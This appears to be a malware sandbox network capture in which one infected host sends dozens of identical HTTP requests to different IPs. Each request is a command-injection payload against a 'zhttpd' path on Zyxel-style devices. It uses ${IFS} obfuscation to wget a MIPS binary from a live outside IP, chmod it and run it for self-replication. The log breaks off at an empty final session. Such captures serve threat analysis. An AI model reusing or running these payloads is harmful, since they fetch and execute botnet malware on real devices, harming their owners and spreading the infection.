                                                Jan 28, 2024 10:16:29.883173943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5552192.168.2.2349032110.191.152.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883200884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5553192.168.2.2351230153.23.158.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883208990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5554192.168.2.2350250160.193.43.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883230925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5555192.168.2.2344486223.58.151.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883268118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5556192.168.2.2342680149.97.55.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883299112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5557192.168.2.2359688133.74.26.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883328915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5558192.168.2.234703095.229.123.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883363008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5559192.168.2.2333116204.2.43.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883384943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5560192.168.2.2344902132.194.42.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883394957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5561192.168.2.2353582110.5.84.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883413076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5562192.168.2.233331493.64.77.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883456945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5563192.168.2.2356560110.0.95.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883470058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5564192.168.2.2343928164.45.65.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883490086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5565192.168.2.2359376174.70.242.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883527040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5566192.168.2.2337476199.213.175.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883549929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5567192.168.2.2355904199.149.243.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883599997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5568192.168.2.2344972221.233.48.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883606911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5569192.168.2.234483895.60.145.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883644104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5570192.168.2.234347087.92.19.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883661032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5571192.168.2.2354198125.189.173.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883677006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5572192.168.2.235278438.96.144.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883713961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5573192.168.2.2355194150.188.60.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883728981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5574192.168.2.2359100164.183.92.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883766890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5575192.168.2.2356718198.46.47.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883785009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5576192.168.2.2360742220.112.85.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883800983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5577192.168.2.2350206208.164.13.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883843899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5578192.168.2.2341882195.186.53.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883872986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5579192.168.2.2333070119.239.118.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883889914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5580192.168.2.2333590144.182.135.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883918047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5581192.168.2.235869499.121.145.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883943081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5582192.168.2.2351980124.180.242.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883960009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5583192.168.2.2355364123.165.146.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.883975983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5584192.168.2.2338332133.226.168.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884012938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5585192.168.2.2358140158.8.169.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884042978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5586192.168.2.2345944196.138.244.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884042978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5587192.168.2.234363289.76.177.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884077072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5588192.168.2.2355308149.1.235.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884119987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5589192.168.2.234037436.119.8.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884135962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5590192.168.2.2337212124.102.61.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884145975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5591192.168.2.2336638114.251.40.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884150982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5592192.168.2.2350318163.87.117.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884191036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5593192.168.2.2339840193.170.65.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884201050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5594192.168.2.234423014.186.158.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884246111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5595192.168.2.2344646116.71.184.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884257078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5596192.168.2.2341966144.23.199.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884311914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5597192.168.2.2355926217.250.143.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884340048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5598192.168.2.2342392189.231.159.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884346008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5599192.168.2.235492673.231.211.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884396076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5600192.168.2.236070860.132.22.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884438038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5601192.168.2.2349626167.73.158.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884464979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5602192.168.2.2333206146.35.53.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884484053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5603192.168.2.235871285.212.56.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884526968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5604192.168.2.2335534204.239.109.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884552956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5605192.168.2.235668613.218.97.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884591103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5606192.168.2.2344158211.159.248.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884608030 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5607192.168.2.2358124205.185.174.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884622097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5608192.168.2.2333678211.142.201.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884641886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5609192.168.2.2335220177.72.156.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884671926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5610192.168.2.235630671.226.204.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884725094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5611192.168.2.2336738139.25.225.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884726048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5612192.168.2.2351398165.9.31.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:29.884740114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5613192.168.2.2358630125.94.230.90443
                                                TimestampBytes transferredDirectionData
